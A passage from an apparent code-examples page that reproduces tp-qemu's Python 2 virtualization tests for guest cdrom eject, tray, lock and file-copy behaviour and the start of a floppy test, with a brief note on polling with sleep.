    def get_match_cdrom(vm, session, serial_num):
        """
        Find the cdrom in the guest that corresponds to the device defined
        on the qemu command line, matched by serial number.

        :param session: VM session.
        :param serial_num: serial number of the cdrom.
        :return: the cdrom device in the guest matching the serial number.
        """
        error.context("Get matching cdrom in guest", logging.info)
        show_serial_num = "ls -l /dev/disk/by-id"
        serial_num_output = session.cmd_output(show_serial_num)
        if serial_num_output:
            serial_cdrom = ""
            for line in serial_num_output.splitlines():
                if utils_misc.find_substring(str(line), str(serial_num)):
                    serial_cdrom = line.split(" ")[-1].split("/")[-1]
                    break
            if not serial_cdrom:
                qtree_info = vm.monitor.info("qtree")
                raise error.TestFail("Could not find a device in the guest"
                                     " whose serial number matches %s from"
                                     " the qemu command line.\n"
                                     "Qtree info: %s" %
                                     (serial_num, qtree_info))

        show_cdrom_cmd = "ls -l /dev/cdrom*"
        dev_cdrom_output = session.cmd_output(show_cdrom_cmd)
        if dev_cdrom_output:
            for line in dev_cdrom_output.splitlines():
                if utils_misc.find_substring(str(line), str(serial_cdrom)):
                    match_cdrom = line.split(" ")[-3]
                    return match_cdrom
            raise error.TestFail("Could not find the corresponding cdrom"
                                 " in the guest for the qemu command line.")

    def get_testing_cdrom_device(vm, session, cdrom_dev_list, serial_num=None):
        """
        Get the testing cdrom used for eject
        :param vm: VM object
        :param session: VM session
        :param cdrom_dev_list: list of cdrom devices in the guest
        :param serial_num: serial number used to match the cdrom (linux guests)
        """
        try:
            if params["os_type"] == "windows":
                winutil_drive = utils_misc.get_winutils_vol(session)
                winutil_drive = "%s:" % winutil_drive
                cdrom_dev_list.remove(winutil_drive)
                testing_cdrom_device = cdrom_dev_list[-1]
            else:
                testing_cdrom_device = get_match_cdrom(vm, session, serial_num)
        except IndexError:
            raise error.TestFail("Could not find the testing cdrom device")

        return testing_cdrom_device

    def disk_copy(vm, src_path, dst_path, copy_timeout=None, dsize=None):
        """
        Start a background copy from src_path to dst_path inside the guest.

        :param vm: VM where to find a disk.
        :param src_path: Source of data
        :param dst_path: Path to destination
        :param copy_timeout: Timeout for starting the copy
        :param dsize: Size of data block which is periodically copied (unused)
        :return: PID of the copy process in the guest
        """
        if copy_timeout is None:
            copy_timeout = 120
        session = vm.wait_for_login(timeout=login_timeout)
        copy_file_cmd = (
            "nohup cp %s %s 2> /dev/null &" % (src_path, dst_path))
        get_pid_cmd = "echo $!"
        if params["os_type"] == "windows":
            copy_file_cmd = "start cmd /c copy /y %s %s" % (src_path, dst_path)
            get_pid_cmd = "wmic process where name='cmd.exe' get ProcessID"
        session.cmd(copy_file_cmd, timeout=copy_timeout)
        pid = re.findall(r"\d+", session.cmd_output(get_pid_cmd))[-1]
        return pid

    def get_empty_cdrom_device(vm):
        """
        Get the cdrom device that has no media inserted.
        """
        device = None
        blocks = vm.monitor.info("block")
        if isinstance(blocks, str):
            for block in blocks.strip().split('\n'):
                if 'not inserted' in block:
                    device = block.split(':')[0]
        else:
            for block in blocks:
                if 'inserted' not in block.keys():
                    device = block['device']
        return device

    def eject_test_via_monitor(vm, qemu_cdrom_device, guest_cdrom_device,
                               iso_image_orig, iso_image_new, max_times):
        """
        Test cdrom eject function via qemu monitor.
        """
        error.context("Eject the iso image in monitor %s times" % max_times,
                      logging.info)
        session = vm.wait_for_login(timeout=login_timeout)
        iso_image = iso_image_orig
        for i in range(1, max_times):
            session.cmd(params["eject_cdrom_cmd"] % guest_cdrom_device)
            vm.eject_cdrom(qemu_cdrom_device)
            time.sleep(2)
            if get_cdrom_file(vm, qemu_cdrom_device) is not None:
                raise error.TestFail("Device %s was not ejected"
                                     " (round %s)" % (iso_image, i))

            iso_image = iso_image_new
            # Alternate images: use the original on even rounds, the new one on odd
            if i % 2 == 0:
                iso_image = iso_image_orig
            vm.change_media(qemu_cdrom_device, iso_image)
            if get_cdrom_file(vm, qemu_cdrom_device) != iso_image:
                raise error.TestFail("Could not change iso image %s"
                                     " (round %s)" % (iso_image, i))
            time.sleep(workaround_eject_time)

    def check_tray_status_test(vm, qemu_cdrom_device, guest_cdrom_device,
                               max_times, iso_image_new):
        """
        Test cdrom tray status reporting function.
        """
        error.context("Change cdrom media via monitor", logging.info)
        iso_image_orig = get_cdrom_file(vm, qemu_cdrom_device)
        if not iso_image_orig:
            raise error.TestError("no media in cdrom")
        vm.change_media(qemu_cdrom_device, iso_image_new)
        is_opened = is_tray_opened(vm, qemu_cdrom_device)
        if is_opened:
            raise error.TestFail("cdrom tray should not be open after"
                                 " changing media")
        try:
            error.context("Copy test script to guest")
            tray_check_src = params.get("tray_check_src")
            if tray_check_src:
                tray_check_src = os.path.join(data_dir.get_deps_dir(), "cdrom",
                                              tray_check_src)
                vm.copy_files_to(tray_check_src, params["tmp_dir"])

            if is_tray_opened(vm, qemu_cdrom_device) is None:
                logging.warn("Tray status reporting is not supported by qemu!")
                logging.warn("cdrom_test_tray_status test is skipped...")
                return

            error.context("Eject the cdrom in guest %s times" % max_times,
                          logging.info)
            session = vm.wait_for_login(timeout=login_timeout)
            for i in range(1, max_times):
                session.cmd(params["eject_cdrom_cmd"] % guest_cdrom_device)
                if not is_tray_opened(vm, qemu_cdrom_device):
                    raise error.TestFail("Monitor reports tray closed"
                                         " when ejecting (round %s)" % i)
                if params["os_type"] != "windows":
                    cmd = "dd if=%s of=/dev/null count=1" % guest_cdrom_device
                else:
                    # windows guest does not support auto close door when reading
                    # cdrom, so close it by eject command;
                    cmd = params["close_cdrom_cmd"] % guest_cdrom_device
                session.cmd(cmd)
                if is_tray_opened(vm, qemu_cdrom_device):
                    raise error.TestFail("Monitor reports tray opened when"
                                         " closing cdrom in guest (round %s)" % i)
                time.sleep(workaround_eject_time)
        finally:
            vm.change_media(qemu_cdrom_device, iso_image_orig)

    def check_tray_locked_test(vm, qemu_cdrom_device, guest_cdrom_device):
        """
        Test cdrom tray locked function.
        """
        error.context("Check cdrom tray status after cdrom is locked",
                      logging.info)
        session = vm.wait_for_login(timeout=login_timeout)
        tmp_is_trap_open = is_tray_opened(vm, qemu_cdrom_device, mode='mixed',
                                          dev_name=guest_cdrom_device)
        if tmp_is_trap_open is None:
            logging.warn("Tray status reporting is not supported by qemu!")
            logging.warn("cdrom_test_locked test is skipped...")
            return

        eject_failed = False
        eject_failed_msg = "Tray should be closed even in locked status"
        session.cmd(params["eject_cdrom_cmd"] % guest_cdrom_device)
        tmp_is_trap_open = is_tray_opened(vm, qemu_cdrom_device, mode='mixed',
                                          dev_name=guest_cdrom_device)
        if not tmp_is_trap_open:
            raise error.TestFail("Tray should not be in closed status")
        session.cmd(params["lock_cdrom_cmd"] % guest_cdrom_device)
        try:
            session.cmd(params["close_cdrom_cmd"] % guest_cdrom_device)
        except aexpect.ShellCmdError, e:
            eject_failed = True
            eject_failed_msg += ", eject command failed: %s" % str(e)

        tmp_is_trap_open = is_tray_opened(vm, qemu_cdrom_device, mode='mixed',
                                          dev_name=guest_cdrom_device)
        if (eject_failed or tmp_is_trap_open):
            raise error.TestFail(eject_failed_msg)
        session.cmd(params["unlock_cdrom_cmd"] % guest_cdrom_device)
        session.cmd(params["close_cdrom_cmd"] % guest_cdrom_device)

    def file_operation_test(session, guest_cdrom_device, max_times):
        """
        Cdrom file operation test.
        """
        filename = "new"
        mount_point = get_cdrom_mount_point(session,
                                            guest_cdrom_device, params)
        mount_cmd = params["mount_cdrom_cmd"] % (guest_cdrom_device,
                                                 mount_point)
        umount_cmd = params["umount_cdrom_cmd"] % guest_cdrom_device
        src_file = params["src_file"] % (mount_point, filename)
        dst_file = params["dst_file"] % filename
        copy_file_cmd = params["copy_file_cmd"] % (mount_point, filename)
        remove_file_cmd = params["remove_file_cmd"] % filename
        show_mount_cmd = params["show_mount_cmd"]
        md5sum_cmd = params["md5sum_cmd"]

        if params["os_type"] != "windows":
            error.context("Mounting the cdrom under %s" % mount_point,
                          logging.info)
            session.cmd(mount_cmd, timeout=30)
        error.context("File copying test", logging.info)
        session.cmd(copy_file_cmd)
        f1_hash = session.cmd(md5sum_cmd % dst_file).split()[0].strip()
        f2_hash = session.cmd(md5sum_cmd % src_file).split()[0].strip()
        if f1_hash != f2_hash:
            raise error.TestFail("On disk and on cdrom files are different, "
                                 "md5 mismatch")
        session.cmd(remove_file_cmd)
        error.context("Mount/Unmount cdrom for %s times" % max_times,
                      logging.info)
        for _ in range(1, max_times):
            try:
                session.cmd(umount_cmd)
                session.cmd(mount_cmd)
            except aexpect.ShellError, detail:
                logging.error("Mount/Unmount fail, detail: '%s'", detail)
                logging.debug(session.cmd(show_mount_cmd))
                raise
        if params["os_type"] != "windows":
            session.cmd("umount %s" % guest_cdrom_device)

    # Test main body start.
    class MiniSubtest(object):

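        # Note: instantiating a subclass runs the whole subtest: __new__
        # calls test(), then clean() (when defined), and re-raises any
        # exception captured from test() once cleanup has finished.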
        def __new__(cls, *args, **kargs):
            self = super(MiniSubtest, cls).__new__(cls)
            ret = None
            exc_info = None
            if args is None:
                args = []
            try:
                try:
                    ret = self.test(*args, **kargs)
                except Exception:
                    exc_info = sys.exc_info()
            finally:
                if hasattr(self, "clean"):
                    try:
                        self.clean()
                    except Exception:
                        if exc_info is None:
                            raise
                    if exc_info:
                        raise exc_info[0], exc_info[1], exc_info[2]
            return ret

    class test_singlehost(MiniSubtest):

        def test(self):
            self.iso_image_orig = create_iso_image(params, "orig")
            self.iso_image_new = create_iso_image(params, "new")
            self.cdrom_dir = os.path.dirname(self.iso_image_new)
            if params.get("not_insert_at_start") == "yes":
                target_cdrom = params["target_cdrom"]
                params[target_cdrom] = ""
            params["start_vm"] = "yes"
            serial_num = generate_serial_num()
            cdrom = params.get("cdroms", "").split()[-1]
            params["drive_serial_%s" % cdrom] = serial_num
            env_process.preprocess_vm(test, params, env, params["main_vm"])
            vm = env.get_vm(params["main_vm"])

            self.session = vm.wait_for_login(timeout=login_timeout)
            pre_cmd = params.get("pre_cmd")
            if pre_cmd:
                self.session.cmd(pre_cmd, timeout=120)
                self.session = vm.reboot()
            iso_image = self.iso_image_orig
            error.context("Query cdrom devices in guest")
            cdrom_dev_list = list_guest_cdroms(self.session)
            logging.debug("cdrom_dev_list: '%s'", cdrom_dev_list)

            if params.get('not_insert_at_start') == "yes":
                error.context("Locked without media present", logging.info)
                # XXX: The device obtained from the monitor might not match
                # the guest device if there are multiple cdrom devices.
                qemu_cdrom_device = get_empty_cdrom_device(vm)
                guest_cdrom_device = get_testing_cdrom_device(vm,
                                                              self.session,
                                                              cdrom_dev_list,
                                                              serial_num)
                if vm.check_block_locked(qemu_cdrom_device):
                    raise error.TestFail("Device should not be locked just"
                                         " after booting up")
                cmd = params["lock_cdrom_cmd"] % guest_cdrom_device
                self.session.cmd(cmd)
                if not vm.check_block_locked(qemu_cdrom_device):
                    raise error.TestFail("Device is not locked as expected.")
                return

            error.context("Detecting the existence of a cdrom (guest OS side)",
                          logging.info)
            cdrom_dev_list = list_guest_cdroms(self.session)
            guest_cdrom_device = get_testing_cdrom_device(vm,
                                                          self.session,
                                                          cdrom_dev_list,
                                                          serial_num)
            error.context("Detecting the existence of a cdrom (qemu side)",
                          logging.info)
            qemu_cdrom_device = get_device(vm, iso_image)
            if params["os_type"] != "windows":
                self.session.get_command_output("umount %s" % guest_cdrom_device)
            if params.get('cdrom_test_autounlock') == 'yes':
                error.context("Trying to unlock the cdrom", logging.info)
                if not utils_misc.wait_for(lambda: not
                                           vm.check_block_locked(qemu_cdrom_device),
                                           300):
                    raise error.TestFail("Device %s could not be"
                                         " unlocked" % (qemu_cdrom_device))

            max_test_times = int(params.get("cdrom_max_test_times", 100))
            if params.get("cdrom_test_eject") == "yes":
                eject_test_via_monitor(vm, qemu_cdrom_device,
                                       guest_cdrom_device, self.iso_image_orig,
                                       self.iso_image_new, max_test_times)

            if params.get('cdrom_test_tray_status') == 'yes':
                check_tray_status_test(vm, qemu_cdrom_device,
                                       guest_cdrom_device, max_test_times,
                                       self.iso_image_new)

            if params.get('cdrom_test_locked') == 'yes':
                check_tray_locked_test(vm, qemu_cdrom_device,
                                       guest_cdrom_device)

            error.context("Check whether the cdrom is read-only", logging.info)
            cmd = params["readonly_test_cmd"] % guest_cdrom_device
            try:
                self.session.cmd(cmd)
                raise error.TestFail("Attempt to format cdrom %s succeeded" %
                                     (guest_cdrom_device))
            except aexpect.ShellError:
                pass

            sub_test = params.get("sub_test")
            if sub_test:
                error.context("Run sub test '%s' before doing file"
                              " operation" % sub_test, logging.info)
                utils_test.run_virt_sub_test(test, params, env, sub_test)

            if params.get("cdrom_test_file_operation") == "yes":
                file_operation_test(self.session, guest_cdrom_device,
                                    max_test_times)

            error.context("Cleanup")
            # Put the original image (self.iso_image_orig) back in the drive
            cdfile = get_cdrom_file(vm, qemu_cdrom_device)
            if cdfile != self.iso_image_orig:
                time.sleep(workaround_eject_time)
                self.session.cmd(params["eject_cdrom_cmd"] %
                                 guest_cdrom_device)
                vm.eject_cdrom(qemu_cdrom_device)
                if get_cdrom_file(vm, qemu_cdrom_device) is not None:
                    raise error.TestFail("Device %s was not ejected"
                                         " in the cleanup stage" % qemu_cdrom_device)

                vm.change_media(qemu_cdrom_device, self.iso_image_orig)
                if get_cdrom_file(vm, qemu_cdrom_device) != self.iso_image_orig:
                    raise error.TestFail("It wasn't possible to change"
                                         " cdrom %s" % iso_image)
            post_cmd = params.get("post_cmd")
            if post_cmd:
                self.session.cmd(post_cmd)
            if params.get("guest_suspend_type"):
                self.session = vm.reboot()

        def clean(self):
            self.session.close()
            cleanup_cdrom(self.iso_image_orig)
            cleanup_cdrom(self.iso_image_new)

    class Multihost(MiniSubtest):

        def test(self):
            error.context("Preparing migration env and cdroms.", logging.info)
            mig_protocol = params.get("mig_protocol", "tcp")
            self.mig_type = migration.MultihostMigration
            if mig_protocol == "fd":
                self.mig_type = migration.MultihostMigrationFd
            if mig_protocol == "exec":
                self.mig_type = migration.MultihostMigrationExec
            if "rdma" in mig_protocol:
                self.mig_type = migration.MultihostMigrationRdma

            self.vms = params.get("vms").split(" ")
            self.srchost = params.get("hosts")[0]
            self.dsthost = params.get("hosts")[1]
            self.is_src = params.get("hostid") == self.srchost
            self.mig = self.mig_type(test, params, env, False, )
            self.cdrom_size = int(params.get("cdrom_size", 10))
            cdrom = params.objects("cdroms")[-1]
            self.serial_num = params.get("drive_serial_%s" % cdrom)

            if self.is_src:
                self.cdrom_orig = create_iso_image(params, "orig",
                                                   file_size=self.cdrom_size)
                self.cdrom_dir = os.path.dirname(self.cdrom_orig)
                vm = env.get_vm(self.vms[0])
                vm.destroy()
                params["start_vm"] = "yes"
                env_process.process(test, params, env,
                                    env_process.preprocess_image,
                                    env_process.preprocess_vm)
                vm = env.get_vm(self.vms[0])
                vm.wait_for_login(timeout=login_timeout)
            else:
                self.cdrom_orig = create_iso_image(params, "orig", False)
                self.cdrom_dir = os.path.dirname(self.cdrom_orig)

        def clean(self):
            self.mig.cleanup()
            if self.is_src:
                cleanup_cdrom(self.cdrom_orig)

    class test_multihost_locking(Multihost):

        def test(self):
            super(test_multihost_locking, self).test()

            error.context("Lock cdrom in VM.", logging.info)
            # Starts in source
            if self.is_src:
                vm = env.get_vm(params["main_vm"])
                session = vm.wait_for_login(timeout=login_timeout)
                cdrom_dev_list = list_guest_cdroms(session)
                guest_cdrom_device = get_testing_cdrom_device(vm,
                                                              session,
                                                              cdrom_dev_list,
                                                              self.serial_num)
                logging.debug("cdrom_dev_list: %s", cdrom_dev_list)
                device = get_device(vm, self.cdrom_orig)

                session.cmd(params["lock_cdrom_cmd"] % guest_cdrom_device)
                locked = check_cdrom_lock(vm, device)
                if locked:
                    logging.debug("Cdrom device is successfully locked in VM.")
                else:
                    raise error.TestFail("Cdrom device should be locked"
                                         " in VM.")

            self.mig._hosts_barrier(self.mig.hosts, self.mig.hosts,
                                    'cdrom_dev', cdrom_prepare_timeout)

            self.mig.migrate_wait([self.vms[0]], self.srchost, self.dsthost)

            # Starts in dest
            if not self.is_src:
                vm = env.get_vm(params["main_vm"])
                session = vm.wait_for_login(timeout=login_timeout)
                cdrom_dev_list = list_guest_cdroms(session)
                logging.debug("cdrom_dev_list: %s", cdrom_dev_list)
                device = get_device(vm, self.cdrom_orig)

                locked = check_cdrom_lock(vm, device)
                if locked:
                    logging.debug("Cdrom device stayed locked after "
                                  "migration in VM.")
                else:
                    raise error.TestFail("Cdrom device should have stayed"
                                         " locked after migration in VM.")

                error.context("Unlock cdrom from VM.", logging.info)
                cdrom_dev_list = list_guest_cdroms(session)
                guest_cdrom_device = get_testing_cdrom_device(vm,
                                                              session,
                                                              cdrom_dev_list,
                                                              self.serial_num)
                session.cmd(params["unlock_cdrom_cmd"] % guest_cdrom_device)
                locked = check_cdrom_lock(vm, device)
                if not locked:
                    logging.debug("Cdrom device is successfully unlocked"
                                  " from VM.")
                else:
                    raise error.TestFail("Cdrom device should be unlocked"
                                         " in VM.")

            self.mig.migrate_wait([self.vms[0]], self.dsthost, self.srchost)

            if self.is_src:
                vm = env.get_vm(params["main_vm"])
                locked = check_cdrom_lock(vm, device)
                if not locked:
                    logging.debug("Cdrom device stayed unlocked after "
                                  "migration in VM.")
                else:
                    raise error.TestFail("Cdrom device should have stayed"
                                         " unlocked after migration in VM.")

            self.mig._hosts_barrier(self.mig.hosts, self.mig.hosts,
                                    'Finish_cdrom_test', login_timeout)

        def clean(self):
            super(test_multihost_locking, self).clean()

    class test_multihost_ejecting(Multihost):

        def test(self):
            super(test_multihost_ejecting, self).test()

            self.cdrom_new = create_iso_image(params, "new")

            if not self.is_src:
                self.cdrom_new = create_iso_image(params, "new", False)
                self.cdrom_dir = os.path.dirname(self.cdrom_new)
                params["cdrom_cd1"] = params.get("cdrom_cd1_host2")

            if self.is_src:
                vm = env.get_vm(self.vms[0])
                session = vm.wait_for_login(timeout=login_timeout)
                cdrom_dev_list = list_guest_cdroms(session)
                logging.debug("cdrom_dev_list: %s", cdrom_dev_list)
                device = get_device(vm, self.cdrom_orig)
                cdrom = get_testing_cdrom_device(vm,
                                                 session,
                                                 cdrom_dev_list,
                                                 self.serial_num)

                error.context("Eject cdrom.", logging.info)
                session.cmd(params["eject_cdrom_cmd"] % cdrom)
                vm.eject_cdrom(device)
                time.sleep(2)
                if get_cdrom_file(vm, device) is not None:
                    raise error.TestFail("Device %s was not ejected" % (cdrom))

                cdrom = self.cdrom_new

                error.context("Change cdrom.", logging.info)
                vm.change_media(device, cdrom)
                if get_cdrom_file(vm, device) != cdrom:
                    raise error.TestFail("It wasn't possible to change "
                                         "cdrom %s" % (cdrom))
                time.sleep(workaround_eject_time)

            self.mig._hosts_barrier(self.mig.hosts, self.mig.hosts,
                                    'cdrom_dev', cdrom_prepare_timeout)

            self.mig.migrate_wait([self.vms[0]], self.srchost, self.dsthost)

            if not self.is_src:
                vm = env.get_vm(self.vms[0])
                vm.reboot()

        def clean(self):
            if self.is_src:
                cleanup_cdrom(self.cdrom_new)
            super(test_multihost_ejecting, self).clean()

    class test_multihost_copy(Multihost):

        def test(self):
            super(test_multihost_copy, self).test()
            copy_timeout = int(params.get("copy_timeout", 480))
            checksum_timeout = int(params.get("checksum_timeout", 180))

            pid = None
            sync_id = {'src': self.srchost,
                       'dst': self.dsthost,
                       "type": "file_trasfer"}
            filename = "orig"
            remove_file_cmd = params["remove_file_cmd"] % filename
            dst_file = params["dst_file"] % filename

            if self.is_src:  # Starts in source
                vm = env.get_vm(self.vms[0])
                vm.monitor.migrate_set_speed("1G")
                session = vm.wait_for_login(timeout=login_timeout)
                cdrom_dev_list = list_guest_cdroms(session)
                logging.debug("cdrom_dev_list: %s", cdrom_dev_list)
                cdrom = get_testing_cdrom_device(vm,
                                                 session,
                                                 cdrom_dev_list,
                                                 self.serial_num)
                mount_point = get_cdrom_mount_point(session, cdrom, params)
                mount_cmd = params["mount_cdrom_cmd"] % (cdrom, mount_point)
                src_file = params["src_file"] % (mount_point, filename)
                copy_file_cmd = params[
                    "copy_file_cmd"] % (mount_point, filename)
                if params["os_type"] != "windows":
                    error.context("Mount and copy data", logging.info)
                    session.cmd(mount_cmd, timeout=30)

                error.context("File copying test", logging.info)
                session.cmd(remove_file_cmd)
                session.cmd(copy_file_cmd)

                pid = disk_copy(vm, src_file, dst_file, copy_timeout)

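            # Publish the PID of the copy process started on the source host
            # to all hosts via the sync server; the destination host uses it
            # to wait for the copy to finish after migration.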
            sync = SyncData(self.mig.master_id(), self.mig.hostid,
                            self.mig.hosts, sync_id, self.mig.sync_server)

            pid = sync.sync(pid, timeout=cdrom_prepare_timeout)[self.srchost]

            self.mig.migrate_wait([self.vms[0]], self.srchost, self.dsthost)

            if not self.is_src:  # Starts in destination
                vm = env.get_vm(self.vms[0])
                session = vm.wait_for_login(timeout=login_timeout)
                error.context("Wait for copy finishing.", logging.info)
                cdrom_dev_list = list_guest_cdroms(session)
                cdrom = get_testing_cdrom_device(vm,
                                                 session,
                                                 cdrom_dev_list,
                                                 self.serial_num)
                mount_point = get_cdrom_mount_point(session, cdrom, params)
                mount_cmd = params["mount_cdrom_cmd"] % (cdrom, mount_point)
                src_file = params["src_file"] % (mount_point, filename)
                md5sum_cmd = params["md5sum_cmd"]

                def is_copy_done():
                    if params["os_type"] == "windows":
                        cmd = "tasklist /FI \"PID eq %s\"" % pid
                    else:
                        cmd = "ps -p %s" % pid
                    return session.cmd_status(cmd) != 0

                if not utils_misc.wait_for(is_copy_done, timeout=copy_timeout):
                    raise error.TestFail("Wait for file copy finish timeout")

                error.context("Compare file on disk and on cdrom", logging.info)
                f1_hash = session.cmd(md5sum_cmd % dst_file,
                                      timeout=checksum_timeout).split()[0]
                f2_hash = session.cmd(md5sum_cmd % src_file,
                                      timeout=checksum_timeout).split()[0]
                if f1_hash.strip() != f2_hash.strip():
                    raise error.TestFail("On disk and on cdrom files are"
                                         " different, md5 mismatch")
                session.cmd(remove_file_cmd)

            self.mig._hosts_barrier(self.mig.hosts, self.mig.hosts,
                                    'Finish_cdrom_test', login_timeout)

        def clean(self):
            super(test_multihost_copy, self).clean()

    test_type = params.get("test_type", "test_singlehost")
    if (test_type in locals()):
        tests_group = locals()[test_type]
        tests_group()
    else:
        raise error.TestFail("Test group '%s' is not defined in"
                             " cdrom test" % test_type)

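Example 7 above uses time.sleep in two ways: a fixed time.sleep(workaround_eject_time) after changing media, and polling (via utils_misc.wait_for) until a condition such as "device unlocked" or "copy finished" holds. Below is a minimal poll-with-sleep helper in the same spirit, using only the standard library; wait_until and the commented usage line are illustrative, not part of tp-qemu.

import time


def wait_until(condition, timeout, step=1.0):
    """Poll condition() every step seconds until it is truthy or timeout
    seconds have passed; return the last value condition() produced."""
    deadline = time.time() + timeout
    result = condition()
    while not result and time.time() < deadline:
        time.sleep(step)
        result = condition()
    return result


# Usage sketch, mirroring the cdrom_test_autounlock wait in Example 7
# (vm and device would come from the surrounding test):
# unlocked = wait_until(lambda: not vm.check_block_locked(device), 300)
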
Example 8

Project: tp-qemu
Source File: floppy.py
View license
@error.context_aware
def run(test, params, env):
    """
    Test virtual floppy of guest:

    1) Create a floppy disk image on host
    2) Start the guest with this floppy image.
    3) Make a file system on guest virtual floppy.
    4) Calculate md5sum value of a file and copy it into floppy.
    5) Verify whether the md5sum does match.

    :param test: QEMU test object.
    :param params: Dictionary with the test parameters.
    :param env: Dictionary with test environment.
    """
    source_file = params["source_file"]
    dest_file = params["dest_file"]
    login_timeout = int(params.get("login_timeout", 360))
    floppy_prepare_timeout = int(params.get("floppy_prepare_timeout", 360))
    guest_floppy_path = params["guest_floppy_path"]

    def create_floppy(params, prepare=True):
        """
        Creates a 'new' blank floppy disk image

        :param params: parameters for test
        :param prepare: if True, write out the blank floppy image.

        :return: path to new floppy file.
        """
        error.context("creating test floppy", logging.info)
        floppy = params["floppy_name"]
        if not os.path.isabs(floppy):
            floppy = os.path.join(data_dir.get_data_dir(), floppy)
        if prepare:
            utils.run("dd if=/dev/zero of=%s bs=512 count=2880" % floppy)
        return floppy

    def cleanup_floppy(path):
        """ Removes created floppy """
        error.context("cleaning up temp floppy images", logging.info)
        os.remove("%s" % path)

    def lazy_copy(vm, dst_path, check_path, copy_timeout=None, dsize=None):
        """
        Start disk load: loop forever in the guest, appending a marker to
        both check_path and dst_path every 0.1 seconds.

        :param vm: VM where to find a disk.
        :param dst_path: File the data is appended to.
        :param check_path: File the same marker is tee'd to.
        :param copy_timeout: Timeout for starting the copy loop.
        :param dsize: Size of data block which is periodically copied (unused).
        :return: PID of the background loop in the guest.
        """
        if copy_timeout is None:
            copy_timeout = 120
        session = vm.wait_for_login(timeout=login_timeout)
        cmd = ('nohup bash -c "while [ true ]; do echo \"1\" | '
               'tee -a %s >> %s; sleep 0.1; done" 2> /dev/null &' %
               (check_path, dst_path))
        pid = re.search(r"\[.+\] (.+)",
                        session.cmd_output(cmd, timeout=copy_timeout))
        return pid.group(1)

    class MiniSubtest(object):

        def __new__(cls, *args, **kargs):
            self = super(MiniSubtest, cls).__new__(cls)
            ret = None
            exc_info = None
            if args is None:
                args = []
            try:
                try:
                    ret = self.test(*args, **kargs)
                except Exception:
                    exc_info = sys.exc_info()
            finally:
                if hasattr(self, "clean"):
                    try:
                        self.clean()
                    except Exception:
                        if exc_info is None:
                            raise
                    if exc_info:
                        raise exc_info[0], exc_info[1], exc_info[2]
            return ret

    class test_singlehost(MiniSubtest):

        def test(self):
            create_floppy(params)
            params["start_vm"] = "yes"
            vm_name = params.get("main_vm", "vm1")
            env_process.preprocess_vm(test, params, env, vm_name)
            vm = env.get_vm(vm_name)
            vm.verify_alive()
            self.session = vm.wait_for_login(timeout=login_timeout)

            self.dest_dir = params.get("mount_dir")
            # If mount_dir is specified, treat the guest as a Linux OS.
            # Some Linux distributions do not load the floppy module at boot,
            # and Windows needs time to load and init the floppy driver.
            if self.dest_dir:
                lsmod = self.session.cmd("lsmod")
                if 'floppy' not in lsmod:
                    self.session.cmd("modprobe floppy")
            else:
                time.sleep(20)

            error.context("Formatting floppy disk before using it")
            format_cmd = params["format_floppy_cmd"]
            self.session.cmd(format_cmd, timeout=120)
            logging.info("Floppy disk formatted successfully")

            if self.dest_dir:
                error.context("Mounting floppy")
                self.session.cmd("mount %s %s" % (guest_floppy_path,
                                                  self.dest_dir))
            error.context("Testing floppy")
            self.session.cmd(params["test_floppy_cmd"])

            error.context("Copying file to the floppy")
            md5_cmd = params.get("md5_cmd")
            if md5_cmd:
                md5_source = self.session.cmd("%s %s" % (md5_cmd, source_file))
                try:
                    md5_source = md5_source.split(" ")[0]
                except IndexError:
                    raise error.TestError("Failed to get md5 from source file,"
                                          " output: '%s'" % md5_source)
            else:
                md5_source = None

            self.session.cmd("%s %s %s" % (params["copy_cmd"], source_file,
                                           dest_file))
            logging.info("Successfully copied file '%s' onto the floppy disk",
                         source_file)

            error.context("Checking if the file is unchanged after copy")
            if md5_cmd:
                md5_dest = self.session.cmd("%s %s" % (md5_cmd, dest_file))
                try:
                    md5_dest = md5_dest.split(" ")[0]
                except IndexError:
                    raise error.TestError("Failed to get md5 from dest file,"
                                          " output: '%s'" % md5_dest)
                if md5_source != md5_dest:
                    raise error.TestFail("File changed after copy to floppy")
            else:
                md5_dest = None
                self.session.cmd("%s %s %s" % (params["diff_file_cmd"],
                                               source_file, dest_file))

        def clean(self):
            clean_cmd = "%s %s" % (params["clean_cmd"], dest_file)
            self.session.cmd(clean_cmd)
            if self.dest_dir:
                self.session.cmd("umount %s" % self.dest_dir)
            self.session.close()

    class Multihost(MiniSubtest):

        def test(self):
            error.context("Preparing migration env and floppies.", logging.info)
            mig_protocol = params.get("mig_protocol", "tcp")
            self.mig_type = migration.MultihostMigration
            if mig_protocol == "fd":
                self.mig_type = migration.MultihostMigrationFd
            if mig_protocol == "exec":
                self.mig_type = migration.MultihostMigrationExec
            if "rdma" in mig_protocol:
                self.mig_type = migration.MultihostMigrationRdma

            self.vms = params.get("vms").split(" ")
            self.srchost = params["hosts"][0]
            self.dsthost = params["hosts"][1]
            self.is_src = params["hostid"] == self.srchost
            self.mig = self.mig_type(test, params, env, False, )

            if self.is_src:
                vm = env.get_vm(self.vms[0])
                vm.destroy()
                self.floppy = create_floppy(params)
                self.floppy_dir = os.path.dirname(self.floppy)
                params["start_vm"] = "yes"
                env_process.process(test, params, env,
                                    env_process.preprocess_image,
                                    env_process.preprocess_vm)
                vm = env.get_vm(self.vms[0])
                vm.wait_for_login(timeout=login_timeout)
            else:
                self.floppy = create_floppy(params, False)
                self.floppy_dir = os.path.dirname(self.floppy)

        def clean(self):
            self.mig.cleanup()
            if self.is_src:
                cleanup_floppy(self.floppy)

    class test_multihost_write(Multihost):

        def test(self):
            super(test_multihost_write, self).test()

            copy_timeout = int(params.get("copy_timeout", 480))
            self.mount_dir = params["mount_dir"]
            format_floppy_cmd = params["format_floppy_cmd"]
            check_copy_path = params["check_copy_path"]

            pid = None
            sync_id = {'src': self.srchost,
                       'dst': self.dsthost,
                       "type": "file_trasfer"}
            filename = "orig"
            src_file = os.path.join(self.mount_dir, filename)

            if self.is_src:  # Starts in source
                vm = env.get_vm(self.vms[0])
                session = vm.wait_for_login(timeout=login_timeout)

                if self.mount_dir:
                    session.cmd("rm -f %s" % (src_file))
                    session.cmd("rm -f %s" % (check_copy_path))
                # If mount_dir is specified, treat the guest as a Linux OS.
                # Some Linux distributions do not load the floppy module at
                # boot, and Windows needs time to load and init the floppy driver.
                error.context("Prepare floppy for writing.", logging.info)
                if self.mount_dir:
                    lsmod = session.cmd("lsmod")
                    if 'floppy' not in lsmod:
                        session.cmd("modprobe floppy")
                else:
                    time.sleep(20)

                session.cmd(format_floppy_cmd)

                error.context("Mount and copy data.", logging.info)
                if self.mount_dir:
                    session.cmd("mount %s %s" % (guest_floppy_path,
                                                 self.mount_dir),
